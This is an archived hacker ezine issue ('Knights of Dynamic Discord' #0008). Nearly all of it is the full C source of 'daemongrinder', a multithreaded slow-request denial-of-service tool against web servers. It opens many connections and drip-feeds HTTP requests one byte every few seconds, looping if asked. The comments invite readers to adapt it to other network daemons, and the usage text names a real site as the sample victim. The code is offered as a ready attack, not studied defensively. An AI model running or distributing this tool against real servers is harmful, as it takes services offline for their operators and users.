💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › KODD › 08.txt captured on 2022-01-08 at 16:22:15.
⬅️ Previous capture (2021-12-04)
-=-=-=-=-=-=-
THE
_ __ _ _ _ __
| |/ / (_) | | | | / _|
| ' / _ __ _ __ _| |__ | |_ ___ ___ | |_
| < | '_ \| |/ _` | '_ \| __/ __| / _ \| _|
| . \| | | | | (_| | | | | |_\__ \ | (_) | |
|_|\_\_| |_|_|\__, |_| |_|\__|___/ \___/|_|
__/ |
|___/
_____ _ _____ _ _
| __ \ (_) | __ \(_) | |
| | | |_ _ _ __ __ _ _ __ ___ _ ___ | | | |_ ___ ___ ___ _ __ __| |
| | | | | | | '_ \ / _` | '_ ` _ \| |/ __| | | | | / __|/ __/ _ \| '__/ _` |
| |__| | |_| | | | | (_| | | | | | | | (__ | |__| | \__ \ (_| (_) | | | (_| |
|_____/ \__, |_| |_|\__,_|_| |_| |_|_|\___| |_____/|_|___/\___\___/|_| \__,_|
__/ |
|___/
#0008
And in our names, thou shall cast down Daemons.
<code>
/* daemongrinder.c - ver0.1 proof of concept */
/* gcc daemongrinder.c -o daemongrinder -pthread */
/*****************************************************************/
/***************** danger will robinson danger *******************/
/*****************************************************************/
/* by Erik the 1st */
// this is a poc attack against http daemons, the concept can easily
// be reworked to attacked any network daemon. i'll leave that as an
// exercise for the reader. all hail eris, all hail discordia!
#include <pthread.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
char *host;
#define MAXDATASIZE 500
#define SECONDDELAY 5
#define THREADCOUNT 50 //go wild ;]
char request[] = "GET / HTTP/1.0\r\nUser-Agent: daemongrinder\r\n\r\n";
void *thr_sub(void *arg)
{
//this is where the magic happens
char *victim;
int x, sockfd, numbytes;
char buf[MAXDATASIZE], t[2];
struct hostent *he;
struct sockaddr_in their_addr;
pid_t pid;
victim = (char *) arg;
if ((he=gethostbyname(victim)) == NULL) {
herror("gethostbyname");
return 0;
}
if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
return 0;
}
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(80);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);
if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) {
perror("connect");
return 0;
}
printf("Thread connected\n");
//send request _slowly_
for (x=0; x<strlen(request); x++) {
if ((numbytes=send(sockfd, &request[x], 1, 0)) == -1) {
perror("send");
return 0;
}
sleep(SECONDDELAY);
}
printf("Data sent\n");
if ((numbytes=recv(sockfd, buf, MAXDATASIZE-1, 0)) == -1) {
perror("recv");
return 0;
}
buf[numbytes] = '\0';
//printf ("%s\n", buf);
printf("Closing connection\n");
sleep(SECONDDELAY*2);
if (sockfd) close(sockfd);
return 0;
}
//command line: daemongrinder <host> <number of threads>
int main (int argc, char *argv[]) {
int i, iret, x, y, loop;
char buf;
pthread_t threads[THREADCOUNT];
if (argc != 3) {
printf ("\nusage - ./daemongrinder <host> <loop>\n");
printf ("<host> is the victim domain name such as www.phrack.org\n");
printf ("<loop> is a bool - either 0 or 1 to decide if daemongrinder should keep running\n\n");
_exit(-1);
}
//host
i = strlen(argv[1]);
host = (char *) malloc (i+1);
strncpy (host, argv[1], i);
//check for loop
loop = atoi(argv[2]);
spagetti:
//create threads
for (x=0; x<THREADCOUNT; x++) {
iret = pthread_create (&threads[x], NULL, thr_sub, (void*) host);
}
for (y=0; y<THREADCOUNT; y++) {
pthread_join (threads[y], NULL);
}
if (loop) goto spagetti;
exit(0);
}
</code>
EOF